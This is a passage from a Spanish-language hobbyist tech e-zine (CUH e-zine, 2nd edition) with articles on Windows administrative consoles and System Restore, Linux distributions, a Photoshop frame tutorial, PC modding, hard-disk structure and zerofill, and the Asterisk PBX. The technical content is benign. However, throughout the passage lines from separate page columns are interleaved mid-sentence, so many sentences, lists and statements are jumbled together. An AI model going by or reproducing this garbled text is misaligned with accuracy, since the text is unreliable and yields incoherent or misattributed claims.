del cpu y en la parte baja , muéstralas estadísticas y
la información en cuanto al funcionamiento del
procesador y del pc en general:

Desde el administrador de tareas también podemos


iniciar un nuevo proceso o aplicación, en fin es
cuestión de familiriarizarse y de usarla
La pestaña Funciones de red, nos permite ver un constantemente
osciloscopio en la parte superior, y desde el menú Otra herramienta imprescindible es el administrador
ver, podemos configurar la velocidad, los bytes de equipos, desde esta consola administrativa
enviados o escoger seleccionar las columnas que teneos un ramillete de posibilidades que nos
aparecen en la parte inferior de dicha funcionalidad: permitirán manejar y administrar correctamente todo
CUH e-zine 2ª edicion Herramientas Administrativas

el pc, para poder acceder al componente de la También contamos con la consola de administración
consola, vamos a menú inicio, ejecutar, allí de dispositivos: desde allí nos fijamos si hay algún
escribimos: compmgmt.msc, nos aparecerá una driver funcionando mal o que necesite de
ventana cono esta: reinstalación, en fin su nombre es devmgmt.msc:

También podemos desfragmentar los disco duros


Allí tenemos una maravillosa opción que se llama desde la consola dfrg.msc :
administración de discos, desde la cual podemos
manejar todos las unidades del PC ya sean lógicas
primarias o extraíbles, podemos formatear, cambiar
el nombre y administrarlas de una manera fácil y
eficiente, el nombre de esta herramienta es
diskmgmt.msc.

Otra consola muy importante es Servicios, desde allí


sabemos los servicios que tenemos activos, podemos
saber la forma en que se inician, su nombre es
services.msc:

Existe otra consola que se llama lusrmgr.msc y allí


nos parece como Usuarios Locales y Grupos:

Esta es solo una pequeña y superficial vista de la


CUH e-zine 2ª edicion Herramientas Administrativas

consola de administración de equipos


Siguiendo con las herramientas imprescindibles para
el eficiente mantenimiento y correcto funcionamiento
del sistema, seguimos con una de las buenas, para
recuperación de daros perdidos o para volver el PC
en un estado anterior, ideal para revertís cambios
críticos que se hacen pero que, bien sea por distintos
motivos se quieren deshacer, la herramienta en
cuestión se llama rstrui.exe o restaurar el sistema,
dicha aplicación la encontramos en la carpeta de
Windows en una subcarpeta llamada restore, desde
allí podemos , restaurar el pc a una fecha en
especifico, (se debe tener punto de restauración para
poder restaurar), también podemos configurarla
para que cree puntos automáticos o también
podemos crear nuestro propios puntos de
restauración, de igual forma podemos deshacer una Si escogemos la opción Crear punto de restauración:
restauración, en caso de obtener resultados
indeseados, para acceder a la herramienta vamos al
menú inicioÆ todos los programasÆ AccesoriosÆ
Herramientas del sistema Æ Restaurar Sistema, nos
aparcera una pantalla como esta:

Nos aparecerá una casilla donde introduciremos el


nombre del punto de restauración, pro si vamos a
efectuar cambios sustanciales o que serian críticos y
tal vez quisiéramos deshacer dichos cambios.

Si seleccionamos la opción Restaurar mi equipo a un


estado anterior nos saldrá la siguiente pantalla
dónde seleccionaremos la fecha a la cual queremos
que sea restaurado el sistema:

Esta ha sido una guía muy superficial de cómo usar


las distintas herramientas administrativas que nos
ofrece el Windows y nos ayudaran a manejar el
Windows de una forma mucho más efectiva, espero
que les sirva a muchos , Nos leemos en el próximo
Seleccionada la fecha de restauración el sistema nos número del CUH e-zine.
avisa sobre la operación que vamos a realizar: By Aleksteir.
CUH e-zine 2ª edicion Guía Distribuciones Linux

Guia a distribuciones Linux By LTSmash

algo complicado, ya que la mayoría de las distros


tienen principios, metas y enfoques de forma que
siempre hay algo para cada persona.

Guía a Distribuciones Linux


Saludos amigos lectores. En esta ocasión voy a
hablar de un tema que se complica demasiado a los
novatos del sistema GNU/Linux, y es referente a las
distribuciones y como elegirlas.

Segun www.distrowatch.com, hay 10 distribuciones


mas importantes que son Ubuntu, Debian, Mepis,
PCLinuxOS, Fedora Core, Slackware, Knoppix,
Gentoo, Mandriva y FreeBSD. Sin embargo, yo hago
un enfoque mas especial a las distros “madre”, que
En el anterior articulo de la ezine hable somo el son 3 y de donde la mayoria surgió: Slackware, Red
sistema GNU/Linux en general, y ahí hable un poco Hat Linux y Debian.
sobre las distribuciones. Sin embargo, a muchos no
les ha quedado claro así que primero hay que tener
clara la definición para después meternos con los Distros Madre
detalles. “ Una distribución Linux o distribución
GNU/Linux (abreviada con frecuencia distro) es un Slackware: Es una distro basada en el principio KISS
conjunto de aplicaciones reunidas que permiten (Keep It Simple Stupid), especialmente hecha con la
brindar mejoras para instalar fácilmente un sistema simplicidad en mente. Es una distro para expertos
operativo basado en programas de muchas fuentes y que utiliza como gestor de paquetes el sistema TGZ
licencias de uso, que reciben la denominación que no tiene resolución de dependencias. Es la distro
convencional de GNU/Linux. Son variantes de mas antigua en desarrollo.
sistemas libres del tipo GNU/Linux que, en general,
se diferencian entre sí por las herramientas para
configuración y sistemas de administración de
paquetes de software para instalar. La elección de
una distribución depende de las necesidades del
usuario y de gustos personales. ”
Entonces podría decirse en pocas palabras que una
distro no es sino un “sabor” de GNU/Linux,
habiendo cientos de estas para escoger según su uso
y el usuario. Actualmente, uno de los “problemas”
(que yo llamaría pretextos) que evitan que la gente
migre a Linux es la variedad de distros existentes, lo
RedHat® Linux: Una distro empresarial y comercial
que confunde y crea un caos en los usuarios ya que
enfocada mas que nada a sistemas corporativos,
no saben que usar, muchas veces provocando que no
creadora del sistema de administración de paquetes
les interese mas migrar.
RPM con resolución de dependencias, fue muy
Sin embargo, elegir una distribución no debería ser
CUH e-zine 2ª edicion Guía Distribuciones Linux

popular en sus inicios y desplazó a Slackware


entonces. No es gratuita (hay que pagar por el
soporte), sin embargo hay una version comunitaria La desconcertante elección entre un número siempre
que es Fedora Core. creciente de distribuciones de Linux puede crear
confusión entre aquellos nuevos en Linux. Esta es la
razón por la que se creó esta página. Listamos las
10 distribuciones que generalmente se consideran las
más extendidas entre los usuarios de Linux de todo
el mundo. Hay otras muchas que probar, y algunas
pueden ser mas adecuadas para tus necesidades,
pero como norma general, las presentes son
poulares y tiene foros y listas de correo muy activas
donde preguntar tus dudas si las tienes.

Lycoris, Xandros y Lindows son consideradas las


mejores para aquellos usuarios nuevos en Linux que
Debian: Una distro completamente libre, su nombre quieren empezar a ser productivos con Linux lo antes
completo es Debian GNU/Linux. Es una distro muy posible sin tener que aprender todas sus
popular por su sistema de paquetes con resolución complejidades. En el lado opuesto tenemos a
de dependencias APT. Tiene 3 ciclos de desarrollo: Gentoo, Debian y Slackware que son distribuciones
estable, pruebas e inestable. más avanzadas que requieren un completo
aprendizaje antes de poder ser usadas
Elección de una Distribución eficientemente. Mandrake, Red Hat y SuSE se
encuentran a medio camino entre ambas. Knoppix es
un caso aparte, es genial para probar Linux sin tener
que hacer nada, ya que funciona directamente del
CD, si ninguna instalación. Estas distribuciones están
listadas en orden de popularidad según DistroWatch,
lo cual no es un indicador de su cuota de mercado o
calidad. Como siempre, agradeceremos cualquier
comentario o sugerencia.
Ahora ya conocemos un poco mas sobre distros, sin Lista
embargo, ¿Qué distro me conviene?
Todo depende, las distros se pueden clasificar dentro
de un “uso específico” y un “uso general”. Las distros • Debian GNU/Linux
de uso específico son distros especializadas para
realizar determinadas tareas (ej. Editar multimedia, • Gentoo Linux
para realizar cálculos y simulaciones, para jugar,
etc.) o bien las de uso general son aquellas con las • LindowsOS
que podemos hacer de todo.
• Lycoris Dekstop/LX
Si es una PC de hogar, lo recomendable es instalar
una distribución sencilla como *Ubuntu, Mandriva, • Knoppix
OpenSuSe, etc. O bien, si es una distro empresarial,
podemos recurrir a RedHat Enterprise Linux, Novell • Mandrake Linux
SuSe, etc. Lo mas importante es si tienes la
• Red Hat Linux

• Slackware Linux

• SuSE Linux

• Xandros OS

oportunidad de probar con varias distros lo hagas, y • Libranet


trabajar con lo que te sientas mas cómodo.
CUH e-zine 2ª edicion Guía Distribuciones Linux

La popularidad del
top 100 está dada por
la cantidad de hits o
visitas a las páginas
que Distrowatch tiene
de cada distribución 51 dyne:bolic
52 Aurox
1 Ubuntu 53 Berry
2 Mandriva 54 Kate OS
3 SUSE 55 AGNULA
4 Fedora 56 Lunar
5 MEPIS 57 PHLAK
6 Debian 58 FreeSBIE
7 KNOPPIX 59 m0n0wall
8 Damn Small 60 BeatrIX
9 Gentoo 61 Onebase
10 Slackware 62 Knoppix STD
11 FreeBSD 63 SmoothWall
12 Xandros 64 LiveCD Router
13 PCLinuxOS 65 Trustix
14 Kubuntu 66 Novell
15 SLAX 67 Morphix
16 CentOS 68 BLAG
17 Vector 69 rPath
18 KANOTIX 70 MoviX
19 PC-BSD 71 Mediainlinux
20 Linspire 72 Gentoox
21 Arch 73 DragonFly
22 Red Hat 74 AUSTRUMI
23 Puppy 75 Astaro
24 Zenwalk 76 FoX Desktop
25 VLOS 77 CRUX
26 Yoper 78 Linux+ Live
27 aLinux 79 BIG LINUX
28 Ark 80 Tao
29 WHAX 81 Progeny
30 GeeXboX 82 tinysofa
31 Solaris 83 Overclockix
32 IPCop 84 ADIOS
33 Feather 85 Lormalinux
34 SME Server 86 Knopperdisk
35 Frugalware 87 Buffalo
36 Gnoppix 88 T2
37 Devil 89 Linux4all
38 Vine 90 SAM
39 LFS 91 RR4/RR64
40 OpenBSD 92 ParallelKnoppix
41 Scientific 93 Source Mage
42 ClarkConnect 94 Lineox
43 White Box 95 CCux
44 Symphony OS 96 YES
45 Foresight 97 redWall
46 Kurumin 98 GobLinX
47 Turbolinux 99 RIP
48 NetBSD 100 GoboLinux
49 Yellow Dog http://www.distrowatch
50 Auditor .com/
CUH e-zine 2ª edicion Guía Distribuciones Linux
CUH e-zine 2ª edicion Marco Retro Style

Marco Retro Style By Logan_Doax


quedara así la firma:

TUTORIAL MARCO RETRO STYLE


Bueno, este tutorial les mostrara como hacer un
marco con un estilo algo retro, el programa a utilizar Ahora vamos al menú Edición y damos clic en
es el Adobe Photoshop 9 CS2, pero se puede utilizar rellenar. Saldrá el siguiente cuadro:
en futuras versiones como el CS3.
Para empezar tienes que tener tu firma casi
terminada como se ve en la siguiente imagen:

En mi caso la mía es de 400 * 150 píxeles.

Aquí tengo hecha una firma del juego Devil May Cry
4, bueno no esta terminada, le aplicaremos un marco Seleccionamos color, nos mostrara la paleta de
estilo retro. colores y escogemos uno que le vaya ala firma; Y le
Para comenzar, vamos a utilizar la herramienta lazo damos clic a OK.
poligonal y le ponemos
Un calado de de 0 píxeles como se muestra en la Vamos al botón agregar estilo de capa ,
enseguida a opciones de fusión y le damos clic. Nos
imagen . aparecerá el siguiente menú:
Creamos una nueva capa dándole al botón crear
nueva capa .y seleccionamos esta nueva capa.

Ahora comenzamos a hacerle a nuestra firma el


marco con la herramienta lazo poligonal haciendo
clic en cada lugar de la firma donde quieras hasta
que termines de rodear toda la firma:

Después vamos al menú selección y a invertir, y nos


CUH e-zine 2ª edicion Marco Retro Style

Seleccionamos sobra paralela y le damos los Como dije antes si los valores que hasta ahora llevo
siguientes valores: no les son de su agrado pueden ponerlos de
acuerdo a que les quede a su firma, ya que no en
todos es el mismo gusto.

Nos vamos a bisel y relieve y ponemos los siguientes


valores y le damos a OK:

Después sombra interior y le damos los valores


siguientes o los que ustedes crean mejores para su
firma:

Ahora vamos al menú selección y damos clic en


deseleccionar, verán que la firma les ha quedado
más o menos así:

Seguimos ahora con resplandor exterior con los


siguientes valores:

Una vez que nos quede así, damos clic en el botón

lazo poligonal y hacemos un rectángulo o


alguna figura de nuestro agrado sobre un borde del
marco de la firma. Y le damos a la tecla suprimir o
supr de nuestro teclado. Esto ira cortándole al marco
“pedazos” en forma de la figura que habíamos
hecho con el lazo poligonal:

Después seleccionamos resplandor interior con los


siguientes valores:

Recuerden que para hacer una nueva figura solo


basta con deseleccionar la imagen hecha por
ustedes con el lazo poligonal, pueden usar la

herramienta marco elíptico


CUH e-zine 2ª edicion Marco Retro Style

O la herramienta marco rectangular . Y pues su


creatividad no tiene limite la mía en algunos casos si,
xD.

Ya por ultimo agregando unos toques finales como


texto y sus efectos quedaría así:

Bueno eso es todo espero y les haiga agradado el


tuto, y les diré el porque de su nombre “marco estilo
retro”, le puse así (no quiere decir que yo lo haiga
inventado) porque cuando comencé en diseño
grafico fue el primer estilo de marco que aprendí y
por ser algo un poco viejo; pues por eso le puse
retro para que se vuelva a usar, xD.

Autor: Logan_Doax
Para: La CUH-Ezine Foro el-hacker.com
CUH e-zine 2ª edicion Modding Gallery

Modding Gallery Editorial


muebles que lo rodean.

El modding es personalizar los PC's añadiéndole,


modificando o en muy raras ocasiones, sacándole
partes, modificando la estructura de la caja,
añadiendo componentes, modificando la forma de
estos para obtener mayor espectacularidad y diseño,
en definitiva es el arte de darle forma y color al PC
poniendo en ello toda la imaginación que se pueda
Modding tener. También es modificar la velocidad de los
componentes, como el FSB o el GPU Clock (llamado
Es el arte moderno de darle una apariencia original overclocking). El modding es modificar. No significa
y personal a una computadora, es como hacerle l que si tomamos un teclado y le cambiamos las
tunning a la PC. Por lo general poseen luces de lucecitas o lo pintamos de dorado seremos expertos
neón, refrigeración con agua, un gabinete llamativo del modding. Este arte lleva su tiempo, es difícil
con distintas formas, etc. decidir lo que uno va a hacer con el PC.

Las modificaciones más comunes que hoy en día se


El "modding" es el arte o técnica de modificar realizan a los ordenadores son:
estética o funcionalmente partes de un ordenador, ya
sea el gabinete, mouse, teclado o monitor. A todo el • Sustitución de diodos LED por otros más
que practica o hace el modding se le llama potentes o catodos fríos de diferentes colores.
"modder". Sin embargo, la palabra modding se • Sustitución de cables IDE por Cables IDE
suele usar frecuentemente para las modificaciones redondeados y/o reactivos al UV (mejoran la
realizadas a un ordenador o a algo relacionado con refrigeración del gabinete)
él, como son los periféricos, accesorios e incluso • Pintado interior o exterior (incluidos
CUH e-zine 2ª edicion Modding Gallery

componentes electrónicos). que dicen que "es posible hacerle tuning al pc muy
• Construcción de ventanas para hacer visible el fácilmente" o "tuning de windows". Otro error
interior o conseguir un efecto estético (con frecuente es, por ejemplo, hay una persona
metacrilato). levantando el gabinete y te dice: "¿Dónde te dejo el
• Construcción de blowholes (entradas o salidas CPU?. Esta pregunta es errónea porque al decir esto
de aire con ventiladores de fácil acceso). nos estamos refiriendo al procesador que es varias
• Colocación de ventiladores para mejorar la
refrigeración de los componentes electrónicos.
• Colocación de un BayBus externo (controlador
de los ventiladores que hay en el interior del
gabinete)
• Colocación de elementos de iluminación
interior y a veces exterior.
• Construcción de elementos para monitorizar
las temperaturas de los componentes
electrónicos o controlar la velocidad de los
ventiladores (Baybus, Fanbus, Rheobus).
• Sustitución total o parcial de los elementos de
refrigeración convencional por elementos de
refrigeración silenciosa o pasiva, refrigeración
líquida o la más reciente refrigeración por
evaporación. Esta última se la conoce
actualmente como "Heat - Pipes".
• Construcción o colocación de algún elemento
original que le dará el estilo único (Rejillas,
bordados,logotipos,etc).

de veces más chico que el gabinete. Para


tranquilizarnos un poco, nosotros no somos los
únicos que cometemos errores: muchas veces les
habrá pasado que no tienen el teclado y les dice:
"No keyboard present. Press F1 to continue".

La persona que se dedica al modding (por hobby o


por trabajo), es decir, el modder, le molesta que le
digan que en su PC le han hecho TUNING. Este
concepto es erróneo, ya que justamente se ha creado
la palabra modding para hacer referencia sólo a los
PC, en cambio el tuning es para los autos. Este error
los están cometiendo las revistas de computación
CUH e-zine 2ª edicion Modding Gallery

Consecuencias del modding


En general, los modders más expertos son los que
tienen más de una computadora en sus casas y no
temen que se rompan o si eso ocurre, sólo será un
raspón para ellos. Esto en parte es cierto, no hay que
arriesgarse innecesariamente, pero hay que tener
algunos cuidados al momento de hacer un modding.
Los menos arriensgados son en los que el periférico
que queremos agregar no lo debemos construir y
sólo debemos agregarlo conectarlo y listo. Los más
arriesgados son en los que uno mismo debe crear
sus periféricos y agregarlos, ya que si algo sale mal,
no le podremos echar las culpas a nadie.
CUH e-zine 2ª edicion Estructura física del HD

Estructura Fisica del Disco Duro By Locutus


grupos tracks alineados forman lo q c llaman
cilindros.

Estructura física del HD


El disco rigido o hd (hard drive) guarda los datos
d la misma forma q 1 cassette, a traves d
tecnicas d almacenamiento magnetico. Esto hace
q los datos sean muy faciles d manipular,
ademas d q los patrones c guardan durante
mucho tiempo, d manera q la unica forma d
estar seguros d eliminar definitivamente y Cuando c graban datos los platos giran a
efectivamente todos los datos es destruirlo gran velocidad pasando bajo los
físicamente (o casi)... esto es lo q hace posible q cabezales d grabación q producen 1
c puedan recuperar datos después d borrados campo q magnetiza la region donde c
accidentales, formateos y cosas peores... ;) tienen q grabar los datos. Durante este
La placa logica o controladora del hd c encarga proceso la superficie adquiere 1 patron
d mandar al/los cabezales las instrucciones para representativo d la información q debe
convertir bytes en patrones magneticos para ser guardada.
grabar datos y el proceso inverso para llevar los Hasta aca todo muy lindo... esta seria la
datos del hd al cpu. situación teorica digamos, pero como sabemos
las cosas tienen 1 desgaste y como consecuencia
sufren daños. 1 d los daños + comunes q
podemos ver en los rigidos son los sectores
dañados o “bad sectors”, estos son sectores q no
pueden ser accedidos debido a daños
“permanentes” a la superficie d alguno d los
platos.
Los hds modernos vienen con sectores d
repuesto. Cuando 1 sector malo es detectado x la
controladora, esta remapea el sector lógico a 1
posicion física diferente; esto es completamente
transparente para el resto del sistema. Cuando el
La superficie magnetica d los discos c divide en SO (sistema operativo) empieza a detectar “bad
tracks, q estan formados x circulos concéntricos sectors” x lo gral es xq la superficie esta dañada
invisibles, y sectores, q son divisiones dentro d y el disco c quedo sin sectores d repuesto.
los tracks. Los datos c empiezan a grabar desde HDD Regenerator
el borde exterior hacia el interior, d manera q el
Esto nos lleva a nuestra proxima utilidad del
hiren’s, el HDD Regenerator, 1 soft q promete
exterior es el track 0. A causa d estar las algo q parece imposible cuando lo escuchamos x
cabezas unidas x 1 brazo es imposible q 1 lea el 1era vez.... “regenerar los sectores dañados”. La
track 20 en 1 plato y la otra el 587 en el otro, verdad q la 1era vez q lo vi no le di mucho
todas quedan clavadas en el mismo lugar credito a la explicación y pense q era
leyendo el mismo track pero d su plato. Estos simplemente otro soft d reparación d hds
CUH e-zine 2ª edicion Estructura física del HD

prometiendo cosas imposibles pero los sector.


resultados me hicieron cambiar d opinión muy
En la pantalla d arriba (la 2da del prog) nos
rapido.
pide q ingresemos el sector desde el q queremos
Según la pagina del soft casi el 60% d los discos q empiece a scannear, enter para arrancar desde
rigidos afectados con sectores dañados poseen el sector 0. Esto es bastante util cuando tenemos
una incorrecta magnetización de la superficie del 1 disco muy grande o muy dañado y x alguna
disco, para solucionar esto dicen haber razon tenemos q detener (o c detiene x esas
desarrollado 1 algoritmo q es usado para cosas q pasan) el proceso en el medio.
reparar las superficies dañadas. Esta tecnología
En este caso tenemos 1 hd d 2Gb o sea los
es independiente del hardware, soporta muchos
2047mb q vemos en la captura, lo q equivale a
tipos d discos y repara daños q ni siquiera puede
4194288 sectores. Si dejamos 1 restauracion x la
hacerlo 1 formateo d “bajo nivel” (en realidad c
mitad todo lo q tendríamos q hacer es ingresar
refiere al “zerofill”, q vemos + adelante). Como
después en s campo hasta q sector llego la
resultado, información previamente ilegible sera
anterior.
restaurada. Por la forma en q la reparación es
hecha la información existente en el disco no c A continuación vemos la pantalla d trabajo del
ve afectada. prog:
Después aclara q “dado q el programa no
cambia la estructura logica del disco el sistema
puede mostrar aun algunos sectores
anteriormente marcados como “bad” y otras
utilidades d disco como scandisk detectaran
sectores lógicos dañados aun cuando el disco ha
sido exitosamente regenerado y ya no esta
afectado x sectores dañados físicamente. Si ud
quiere remover estas marcas, reparticione el
hd...” o sea q tendríamos q volver a formatear el
disco para q actualize la info d los sectores
dañados.
Si cortaramos la regeneracion en este punto
Vamos entonces a ver el soft q es bastante facil d
podriamos después lanzarla como deciamos
usar. En la 1er pantalla nos dice q los hds q
antes en el sector 1577000 para continuar desde
reconoce en el sistema y nos pide ingresar cual
el punto en q habiamos dejado antes. No tenia
es el q queremos reparar. Si localiza solamente 1
ningun disco con “bad sectors” a mano asi q no
avisa y pide cualquier tecla para seguir. Después
pude sacar captura d 1 falla... ;) Cuando en prog
vemos esta pantalla:
encuentra 1 sector malo van a ver q aparece 1 B
roja como la q c puede ver en el extremo inferior
izq d la pantalla, si el sector es recuperado la B
cambia x la R celeste de “recovered”.
No sean impacientes al correrlo, puede tardar
horas el proceso según el estado del disco.
Algunas veces tuve q dejarlo corriendo d 1 dia
para el otro y algunas otras tuve q pasarlo 2 o 3
veces antes d recuperar completamente el disco
pero les aseguro q es verdad q arregla + d la
mitad d las fallas d este tipo... x supuesto q
muchas veces hay q combinarlo con “formateos
d bajo nivel” (ya lo vemos) o alguna otra cosa
pero el trabajo q hace el soft es muy bueno... 1
Para los q no leen ingles... “HDD Regenerator herramienta infaltable... ;)
permite reparar sectores malos en discos
Formato de bajo nivel o relleno d ceros??
dañados sin perdida d datos existentes. El mismo
(zerofill)
ignora el sistema d archivo y puede ser usado
tanto con discos sin formato como discos Xq el titulo diran? Q es zerofill? Q es 1 formato
formateados con FAT, NTFS o cualquier otro d bajo nivel? Vamos x partes...
sistema d archivos”. El regenerator no para a En la antigüedad (si podemos llamar antigüedad
fijarse en sistemas d archivos ni le interesa, a hace 10 o 15 años xD) era bastante comun el
trabaja completamente a nivel d hard... sector x formateo d bajo nivel para reparar problemas
CUH e-zine 2ª edicion Estructura física del HD

con los rigidos... en la actualidad prácticamente q c me ocurrio... moraleja? Piénsenlo 2 veces si


no es necesario, salvo en casos extremos, y las no estan seguros. ;)
utilidades q dicen hacer 1 formateo d bajo nivel
En resumen, en la actualidad la mayoría d los
(maxblast, seatools, dlg, etc) lo q en realidad
softs q dicen hacer este tipo d formato lo único q
hacen es 1 “zerofill”... o sea llenar el disco con
hacen es 1 “zerofill” o relleno con ceros y los q
ceros.
lo hacen verdaderamente casi nunca son
Hay básicamente 2 tipos d formateo, el formateo completamente necesarios y no es para nada
d alto nivel (o lógico) es el + comun, es el q aconsejable q el usuario final c meta con estas
hacemos al hacer el tipico “format c:” desde la cosas. El zerofill, aunque no rehace la estructura
consola o el clic derecho del explorador d win. como lo haría el formateo, es muy efectivo ya q
Este formateo lo q hace es armar el sistema d borra efectivamente todo dato q haya en el disco
archivos q vamos a usar para q el SO pueda incluyendo cualquier tipo d virus, problemas d
grabar o leer desde el. El formato depende del partición, etc.
SO q instalemos ya q cambia según el mismo
Volvamos al Hiren’s entonces... dentro del menu d
pudiendo haber distintos sistemas d archivos en 1
“Hard Disk Tools” vamos a “Next” y nos salen las
SO.
utilidades d la mayoria d las marcas conocidas d
El formateo d bajo nivel (o fisico) vuelve a crear hds:
la estructura física del disco d la q hablábamos
anteriormente (tracks, sectores, etc) desde 0,
dejando el disco igualito a como salio d
fabrica... como siempre todo muy lindo hasta q
lo llevamos a la practica... ;)

no los voy a explicar 1x1 xq todos hacen casi lo


mismo y son muy faciles d utilizar. Básicamente
lo q hacen es reconocer el disco, dar info sobre
el mismo, testear en busca d errores y el famoso
“zero fill”. Algunos como el powermax (para
Lo cierto es q a pesar d q la estructura d los
Maxtor) tienen 2 opciones para zerofill... en este
discos es casi la misma, cada fabricante varia
x ej tenemos 1 formato quick, q solo llena con
algo para optimizarla y sacarle todo el jugo...
ceros los 1eros 300mb y los últimos 100, y uno
entonces si usamos 1 herramienta genérica para
completo q llena todo el disco.
formatear a bajo nivel lo + probable es q el
disco funcione + lento y hasta no arranque. En el Siempre c debe usar la herramienta especifica
setup d algunos mothers viejos (286, 386) venia 1 del disco q tiene el problema, como dijimos
utilidad genérica para hacerlo, los discos en esa antes cada fabricante tiene distinta forma d
época eran mucho + primitivos y con organizar el hd y usar 1 generico o d otra marca
capacidades d 20 o 40mb ademas d q tenian 1 d disco puede traer resultados bastante malos...
parametro para el formateo llamado ;)
“interleaving”... es muy largo d explicar pero los Como habíamos dicho al principio la info queda
discos giraban + rapido d lo q el sistema podia en el disco después d formateos normales (d alto
asimilar la info, entonces el interleaving era algo nivel), borrados d particiones o archivos, etc. El
asi como 1 num X d vueltas q daba el plato entre proceso del zerofill asegura q todos los datos
q la logica leia info, la mandaba al micro y del disco fueron borrados d manera q si quieren
volvia a leer... :P ... primitivo no?... estar seguros d hacer desaparecer algo esta es
El tema es q me acuerdo d haber metido 1 disco una d las maneras + efectivas.
d 540mb en 1 d esas y formatearlo a bajo nivel... Creo q ya es suficiente con los hds, asi q a – q c
x supuesto q 540mb era prácticamente lo mismo me ocurra algo bien interesante en el prox num
q 80gb para el pobre mother q no entendía vamos a seguir con otra cosa para no aburrir...
nada... je... le puse interleaving d 0 para aunq sobre rigidos c podrían escribir libros
empezar a probar. Q paso? Todavía debe andar enteros. ;)
x ahí tirado... nunca + arranco x + q lo volvi a
formatear unas cuantas veces cambiando todo lo |_ocutus
CUH e-zine 2ª edicion Asterisk

ASTERISK By JUCA
Para conectar teléfonos normales analógicos hacen
falta unas tarjetas telefónicas FXS o FXO fabricadas
por Digium o por otros fabricantes, ya que para
conectar el

servidor a una línea externa no vale con un simple


módem.

Quizá lo más interesante de Asterisk es que soporta


HISTORIA muchos protocolos VoIP como pueden ser SIP, H.323,
IAX y MGCP. Asterisk puede interoperar con
Asterisk, la aplicación de centralita telefónica PBX
terminales IP actuando como un registrador y como
bajo licencia GPL, fue desarrollada por Mark
gateway entre ambos.
Spencer, entonces estudiante de ingeniería
informática en la Universidad de Auburn, Alabama. Lejos de poder competir con las compañías que
Mark había creado en 1999 la empresa "Linux
Support Services" con el objetivo de dar soporte a
usuarios de Linux. Para ello necesitaba una centralita
telefónica, pero ante la imposibilidad de adquirirla
dados sus elevados precios, decidió construir una
con un PC bajo Linux, utilizando lenguaje C.

Posteriormente "Linux Support Services" se


convertiría en el año 2002 en "Digium", redirigiendo
sus objetivos al desarrollo y soporte de Asterisk.

QUE ES ASTERISK

Asterisk es una aplicación software libre de una comercializan soluciones de VoIP Hw/Sw de alta
central telefónica (PBX). Como cualquier PBX, se calidad como Alcatel, Cisco, Avaya ó Nortel,
puede conectar un número determinado de teléfonos Asterisk se empieza a adoptar en algunos entornos
para hacer llamadas entre sí e incluso conectar a un corporativos como solución de bajo coste junto con
proveedor de VoIP o bien a una RDSI tanto básicos SER (Sip Express Router)
como primarios.

Asterisk tiene licencia GPL.

Originalmente desarrollado para el sistema


operativo GNU/Linux, Asterisk actualmente también SERVICIOS
funciona en BSD, MacOSX, Solaris y Microsoft
Windows, aunque la plataforma nativa (GNU/Linux) Asterisk provee los siguientes servicios:
es la mejor soportada de todas.

Asterisk incluye muchas características anteriormente • VoiceMail ( Buzón de Mensajes )


sólo disponibles en caros sistemas propietarios PBX:
buzón de voz, conferencias, IVR, distribución • Call Conferencing ( Servicio de
automática de llamadas, y otras muchas más. Los Conferencia )
usuarios pueden crear nuevas funcionalidades
escribiendo un dialplan en el lenguaje de script de • Interactive Voice Response and Call
Asterisk o añadiendo módulos escritos en lenguaje C Queuing (Sistemas de Audio Respuesta y
o en cualquier otro lenguaje de programación Cola de Llamadas )
soportado por Linux.
CUH e-zine 2ª edicion Asterisk

• Caller ID ( Identificador de Llamada ) reunión virtual y suministra la correcta


gestión y control de los usuarios que se
Asterisk puede funcionar como cualquier centralita incorporan a ella.
tradicional, e incorpora todas sus funcionalidades.
• IVR: Operadora Automática. Sistema
• Conexión con líneas de telefonía automatizado de respuesta que permite
tradicional, mediante interfaces tipo redirigir las llamadas entrantes en función de
analógico (FXO) para líneas de teléfono fijo las opciones seleccionadas por el llamante.
o bien móvil y RDSI (BRI o PRI).
• Informes detallados de llamadas
• Soporte de extensiones analógicas, (CDR): Detalle de llamadas
bien para terminales telefónicos analógicos, realizadas/recibidas por extensión, para
terminales DECT o bien equipos de fax. imputación de costes departamentales, por
cliente o incluso para facturación.
• Soporte de líneas (trunks) IP: SIP,
H323 o IAX. • ACD: Sistema Automático de
Distribución de Llamadas entrantes. Pensado
• Soporte de extensiones IP: SIP, SCCP, para Centros de Llamadas para atención
MGCP, H323 o IAX. comercial o soporte técnico.

• Música en Espera basada en archivos • CTI: Integración con sistemas de


MP3 y similar. gestión comercial o de atención a cliente
(CRM).
• Funciones básicas de usuario:
• IPCC (IP Contact Center): Integración
o Transferencias (directa o con sistemas avanzados de gestión de
consultiva) centros de llamadas, vía soluciones abiertas
o propietarias.
o Desvíos
Asterisk no necesita ningún hardware adiciona para
o Capturas (de grupo o de el servicio de voz sobre IP. Asterisk soporta una gran
extensión) variedad de hardware de distintos proveedores para
la interconexión con los sistemas de tecnología
o Conferencia múltiple
tradicional o red de telefónica publica, entre los que
o Aparcamiento de llamadas se encuentran tarjetas con soporte para líneas T1 ,
(Call parking) E1 , RDSI PRI , RDSI BRI y tarjetas de una sola línea o
puerto FXO.
o Llamada directa a extensión
Asterisk provee todas las características de un PBX
o Retrollamada - Callback
tradicional y mucho mas ya que puede integrar toda
(llamada automática cuando
su red de telefónica corporativa localizada en
disponible)1.
distintos puntos utilizando la red Internet y hacerla
o Paging - Megafonía a través ver como un PBX único.
del altavoz del teléfono2
PROTOCOLOS & CODECS
o DND

Funciones avanzadas

El sistema incorpora asimismo muchísimas


funcionalidades avanzadas que tendrían un elevado
coste en sistemas tradicionales propietarios.

• Buzón de Voz: sistema de contestador


automático personalizado por usuario. Se
integra con el sistema de directorio (LDAP) y
con el email.

• Sistema de Audio conferencias:


Sistema que permite la conexión remota de
diferentes usuarios que quieren mantener una
PRINCIPALES VENTAJAS
CUH e-zine 2ª edicion Asterisk

Funcionalidad En las versiones de desarrollo el tercer valor siempre


Asterisk dispone de todas las funcionalidades de las es un cero, seguido de la palabra "beta" y un
grandes centralitas propietarias (Cisco, Avaya, número, para indicar la revisión.
Alcatel, Siemens, etc). Desde las más básicas Radiografía
(desvíos, capturas, transferencias, multi-conferencias)
hasta las más avanzadas (Buzones de voz, IVR, CTI, A continuación se presentan dos cuadros con
ACD…). algunos datos y cifras de la aplicación. Estos datos
se han obtenido aplicando el modelo COCOMO.
Escalabilidad Aunque este modelo se aplica habitualmente a
El sistema puede dar servicio desde 10 usuarios en procesos "clásicos" de producción de software, y en
una sede de una pequeña empresa, hasta 10.000 de consecuencia las cifras obtenidas han de tomarse
una multinacional repartidos en múltiples sedes. con precaución, permite hacerse una idea del
